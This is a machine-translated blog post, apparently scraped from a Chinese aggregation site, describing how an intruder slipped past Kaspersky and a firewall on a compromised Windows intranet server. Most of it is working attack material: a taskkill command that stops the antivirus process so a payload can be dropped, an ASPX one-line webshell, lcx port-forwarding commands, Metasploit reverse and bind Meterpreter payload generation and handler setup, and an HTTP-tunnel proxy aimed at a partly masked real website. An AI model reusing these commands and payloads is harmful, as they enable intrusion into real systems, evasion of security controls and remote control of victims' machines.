当前位置:网站首页>A summary of the posture of bouncing and forwarding around the firewall
A summary of the posture of bouncing and forwarding around the firewall
2022-06-24 07:29:00 【Xiaoxiang Xin'an】
Statement : Most of the official account is from the author's daily notes. , A few articles are also reproduced by authorship of the original author and other official account. , unaccredited , It is strictly prohibited to reprint , If you want to reprint , Contact and talk . Do not use the related technology in the article to engage in illegal testing , Any adverse consequences arising from this are not related to the author and the official account. . |
|---|
0x01 Preface
Date/time:2014 year , Recently, I got some pain from setting up an intranet server , There is Kaspersky Anti-Virus 8.0. In the normal environment, the intranet is used directly Lcx Forward the specified port to , But how to bypass the firewall ? Here I wrote this record article according to the practice test process .
Bypass Kaba to get the session :
kavfswp.exe It is Kaspersky's anti-virus work process , Used to intercept malicious programs , Such as the common right raising EXP、MSF Load, etc , However, it is found in the test that this process can be ended ( With self start ), It will automatically run the process a few seconds after the end of the process , But there will be a few seconds between them , Use the interval time to quickly MSF Just upload the load and run it .
notes : It was found that there were several times when they did not run for a long time kavfswp.exe, The test was a little painful , I will not worry about this problem any more .
taskkill /f /im kavfswp.exe
In the actual test process, we have put Kaspersky After the anti-virus protection is turned off, it still cannot be forwarded normally , So I guess the system firewall may be turned on or there may be some other hardware firewall , The following tools and methods were tested in this bypass case .
0x02 Lcx
The regular Intranet environment can be used directly Lcx.exe Forward the specified port , Then connect locally 1234 Port can . But here we can see what we are listening to 51 The connection status of the port is SYN_SENT, The probability is that it is blocked by the firewall inbound and outbound rules .
C:\Recovery\lcx.exe -listen 51 1234 C:\Recovery\lcx.exe -slave 113.xxx.xx.5 51 127.0.0.1 3389 [option:] -listen Connection port <ConnectPort> Sending port <TransmitPort> -tran Connection port <ConnectPort> Sending host <TransmitHost> Sending port <TransmitPort> -slave Connecting hosts <ConnectHost> Connection port <ConnectPort> Sending host <TransmitHost> Sending port <TransmitPort>
Basic friend @KoMas Tips : Use Lcx The listening port can be changed to 80 You can bypass firewall restrictions , During the test, you should pay attention to check the local 80 Whether the port is occupied , If it is occupied, an error will be returned , Missing picture .(Success !)
0x03 Aspx Client
Aspx Client In a word, code :
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>C:\Recovery\lcx.exe -listen 52 1234 [+] Listening port 52 ...... [+] Listen OK! [+] Listening port 1234 ...... [+] Listen OK! [+] Waiting for Client on port:52 ......
0x04 Metasploit
(1) Reverse_tcp
Use Metasploit Generate attack payloads and listen , Then the attack payload port.exe File by Webshell Upload to the target disk and execute , You can see that one is blocked by the firewall , As shown in the figure below .
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=113.***.**.250 LPORT=12345 X > /media/hake/port.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.10 msf exploit(handler) > set LPORT 12345 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.10:12345 [*] Starting the payload handler...
stay 《Metasploit bind_tcp Actual combat application 》 The precautions mentioned in the article : If reverse_tcp Try to change the port after the reverse connection is blocked 80、443、8080, These ports are rarely blocked , After the actual test, it is found that the listening port only needs to be changed to 80 You can bypass firewall restrictions to get Meterpreter conversation .(Success !)
(2) Bind_tcp
Use bind_tcp Used for forward connection test 9999 Listening port , After running the attack payload, the target host is opened 9999 port , But not with our attack aircraft IP establish TCP Connect .
[email protected]:~# msfpayload windows/meterpreter/bind_tcp LPORT=9999 X > /media/hake/port.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(handler) > set RHOST 80.**.**.21 msf exploit(handler) > set LPORT 9999 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler...
(3) Reverse_http
Metasploit_Reverse_http The idea comes from 90sec A Daniel and DM_ An article from “metasploit Notes on Intranet penetration ”, But in the actual test, it is found that , Using other ports will be blocked by the firewall , As shown in the figure below .
[email protected]:~# msfpayload windows/meterpreter/reverse_http LHOST=113.***.**.236 LPORT=4444 R | msfencode -t aspx -o /media/hake/port.aspx msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(handler) > set LHOST 192.168.1.9 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit [*] Started HTTP reverse handler on http://0.0.0.0:4444/ [*] Starting the payload handler...
Basic friend @darkz3r Tips , He usually uses 443 Port as listening port , With the attitude of trying, I didn't expect to really succeed , According to him, heikuo is often used in foreign countries 443 Port to listen .
(4) Reverse_https
We tested it earlier Reverse_tcp Listening port 1234 and reverse_http Listening port 4444 Are blocked by the firewall , But testing reverse_https Listening port 4444 It was found that the firewall restriction was successfully bypassed to obtain Meterpreter conversation , Missing picture .
[email protected]:~# msfpayload windows/meterpreter/reverse_https LHOST=113.***.**.106 LPORT=4444 X > /media/hake/test.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.1.9 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit [*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler... [*] 113.***.**.106:2069 Request received for /5xWX... [*] 113.***.**.106:2069 Staging connection for target /5xWX received... [*] Patched user-agent at offset 663656... [*] Patched transport at offset 663320... [*] Patched URL at offset 663384... [*] Patched Expiration Timeout at offset 664256... [*] Patched Communication Timeout at offset 664260... [*] Meterpreter session 3 opened (192.168.1.5:4444 -> 80.**.**.21:2069) at 2014-08-05 23:49:20 +0800
0x05 reDuh_Gui
reDuh_Gui The tool support scripts are :ASPX/PHP/JSP, In the process of penetration testing, it also depends on which scripts the target host supports , The target host I tested here supports ASPX/PHP Script , take ASPX The script does a demo test , As shown in the figure below .
0x06 Http_Tunna
We often use reDuh、Tunna and reGeorg And so on are positive agents , Upload the proxy script to the server , The local program connects to the script on the server , Script as agent forwarding port and traffic , It is also called port multiplexing ,HTTP Tunnel .
although Http_Tunna and reDuh_Gui It works the same way , but Http_Tunna than reDuh_Gui Fast , And more stable . Support scripts include :ASPX/PHP/JSP, You can also directly Metasploit Use... Under the frame , But first you have to tunna_exploit.rb Copy the document to MSF Module directory , Missing picture .
[email protected]:~# ruby proxy.rb -u http://www.canton*********dolonne.fr/u_fichier/conn.aspx -l 1234 -r 3389 -v msf > use exploit/windows/misc/tunna_exploit msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(tunna_exploit) > set RHOST 113.***.**.236 msf exploit(tunna_exploit) > set TARGETURI http://www.canton*********dolonne.fr/u_fichier/conn.aspx msf exploit(tunna_exploit) > set VERBOSE true msf exploit(tunna_exploit) > exploit -j
notes : It was found in the test that reDuh_Gui succeed , and Http_Tunna But failed , Maybe I have a problem with my posture , It could be Http_Tunna ASPX Script problems ,@ Chen Xiaobing Shifu also mentioned in his article that I saw JSP and PHP Successful port forwarding , Therefore, it is necessary to conduct more tests in actual combat , The author will no longer study the reasons for its failure in detail .
0x07 Bypass Firewall
Ⅰ. Use the reverse connection test 80/443 Wait for the listening port to see if it can bypass the firewall restrictions .(Success !)
1. Lcx、2. Aspx Client、3.1 Reverse_tcp、3.3 Reverse_http、3.3 Reverse_https
Ⅱ. Use the forward connection test Bind_tcp Attack payload to see if it can bypass firewall restrictions .(Failure!)
3.2 Bind_tcp
Ⅲ. Use HTTP Tunnel test reDuh_Gui,Tunna_0.1 And other tools to see if they can bypass firewall restrictions .(Success !)
4. reDuh_Gui、5. Http_Tunna、reGeorg、neo_reGeorg
边栏推荐
- jarvisoj_level2
- 2、 What is the principle of layer 3 and 4 switching technology? Recommended collection!
- get_started_3dsctf_2016
- Bjdctf 2020 Bar _ Babystack
- [从零开始学习FPGA编程-41]:视野篇 - 摩尔时代与摩尔定律以及后摩尔时代的到来
- What are the dazzling skills of spot gold?
- Description of module data serial number positioning area code positioning refers to GBK code
- In JS, the regular expression verifies the hour and minute, and converts the input string to the corresponding hour and minute
- [WUSTCTF2020]alison_likes_jojo
- 简单使用Modbus转BACnet网关教程
猜你喜欢
How to connect the Bluetooth headset to the computer and how to connect the win10 computer to the Bluetooth headset
Prefix and topic training
【帧率倍频】基于FPGA的视频帧率倍频系统verilog开发实现
![[WUSTCTF2020]爬](/img/b6/4a0582144c3125e7a0666bbbbfe29d.png)
[WUSTCTF2020]爬
What are the dazzling skills of spot gold?
華為雲數據庫進階學習
Intranet learning notes (4)
Huawei cloud database advanced learning
Buuctf misc grab from the doll
【pointNet】基于pointNet的三维点云目标分类识别matlab仿真
随机推荐
华为云数据库进阶学习
Can the small fire Chunfeng tea make its debut by "keeping fit"?
How to select a third-party software testing company? 2022 ranking of domestic software testing institutions
Ultra wideband pulse positioning scheme, UWB precise positioning technology, wireless indoor positioning application
[OGeek2019]babyrop
Win11怎么设置让CPU性能全开?Win11CPU怎么设置高性能模式?
如何删除/选择电脑上的输入法
相機標定(標定目的、原理)
What are the dazzling skills of spot gold?
What is an intrusion detection system?
【Vulhub靶场】】zabbix-SQL注入(CVE-2016-10134)漏洞复现
相机标定(标定目的、原理)
Mysql---三张表(student,课程,分数) 查询课程为数学的学生姓名,编号,成绩
Accessing user interface settings using systemparametersinfo
Étalonnage de la caméra (objectif et principe d'étalonnage)
(CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】
在终端pip install xxx但在pycharm却no module named xxx
Prefix and topic training
The P2V and V2V software starwind converter is really easy to use
Analog display of the module taking software verifies the correctness of the module taking data, and reversely converts the bin file of the lattice array to display